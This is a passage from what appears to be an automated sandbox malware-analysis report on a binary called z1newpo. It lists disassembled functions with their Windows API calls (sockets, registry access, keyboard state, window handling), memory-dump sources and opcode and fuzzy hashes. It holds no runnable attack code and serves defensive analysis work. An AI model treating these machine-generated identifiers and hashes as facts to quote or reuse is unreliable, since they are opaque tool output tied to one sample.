                                                    • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                    • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                    • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                    Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                    • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                    • gethostbyname.WSOCK32(?), ref: 004655A6
                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                    • _memmove.LIBCMT ref: 004656CA
                                                    • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                    • WSACleanup.WSOCK32 ref: 00465762
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                    • String ID:
                                                    • API String ID: 2945290962-0
                                                    • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                    • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                    • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                    • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                    Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                    • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                    • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                    • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                    • String ID:
                                                    • API String ID: 1457242333-0
                                                    • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                    • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                    • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                    • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                    Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 15295421-0
                                                    • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                    • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                    • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                    • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                    Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcstok.LIBCMT ref: 004675B2
                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                    • _wcscpy.LIBCMT ref: 00467641
                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                    • _wcslen.LIBCMT ref: 00467793
                                                    • _wcslen.LIBCMT ref: 004677BD
                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                    • String ID: X
                                                    • API String ID: 780548581-3081909835
                                                    • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                    • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                    • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                    • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                    Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                    • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                    • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                    • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                    • CloseFigure.GDI32(?), ref: 0044751F
                                                    • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                    • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                    • String ID:
                                                    • API String ID: 4082120231-0
                                                    • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                    • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                    • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                    • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                    Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                    • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                    • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                    • String ID:
                                                    • API String ID: 2027346449-0
                                                    • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                    • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                    • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                    • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                    Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                    • GetMenu.USER32 ref: 0047A703
                                                    • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                    • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                    • _wcslen.LIBCMT ref: 0047A79E
                                                    • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                    • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                    • String ID:
                                                    • API String ID: 3257027151-0
                                                    • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                    • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                    • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                    • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                    Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastselect
                                                    • String ID:
                                                    • API String ID: 215497628-0
                                                    • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                    • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                    • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                    • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                    Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(?), ref: 0044443B
                                                    • GetKeyboardState.USER32(?), ref: 00444450
                                                    • SetKeyboardState.USER32(?), ref: 004444A4
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                    • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                    • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                    • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                    Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00444633
                                                    • GetKeyboardState.USER32(?), ref: 00444648
                                                    • SetKeyboardState.USER32(?), ref: 0044469C
                                                    • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                    • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                    • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                    • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                    • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                    • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                    Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                    • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                    • String ID:
                                                    • API String ID: 2354583917-0
                                                    • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                    • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                    • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                    • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                    Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                    • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                    • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                    • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                    Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                    • String ID:
                                                    • API String ID: 896007046-0
                                                    • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
